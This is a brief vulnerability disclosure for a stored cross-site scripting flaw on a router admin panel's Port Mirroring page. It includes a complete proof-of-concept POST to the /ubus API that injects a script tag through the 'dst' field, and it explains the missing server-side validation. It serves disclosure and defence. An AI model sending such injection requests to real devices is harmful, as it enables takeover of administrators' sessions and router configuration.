XSS attacks are possible on the advanced "Port Mirroring" page of the administrator panel.

PoC

POST /ubus HTTP/1.1
Host: 125.186.175.246
Content-Length: 180
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: <http://125.186.175.246>
Referer: <http://125.186.175.246/port_mirror.html>
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive

{"jsonrpc":"2.0","id":24,"method":"call","params":["c9e196f595bf577f4bde4595c29cc2ae","uci","add",{"config":"diagnosis","type":"diag","values":{"server_type":"all","dst":"<script>alert('XSS')</script>"}}]}

Since the dst parameter is rendered without any escaping or validation, an XSS vulnerability occurs.

Target port option input section

dst_options:function(){
    var me = this;
    var reData = [];
    for(var i=1; i<5; i++){
        var tempObj = {};

        tempObj = '<option value="lan' + i + '">LAN' + i + '</option>';
        reData.push(tempObj);
    }

    $("#dst_options").html(reData);
},

• In dst_options:function(), it only creates the options to display when selecting the target port, and the user selects from the generated list.
• However, when sending values to the router, there is no validation logic for values outside the list, allowing them to be sent directly via a POST request.
• If an attacker directly sends a script to the /ubus API, it gets saved in the UCI configuration.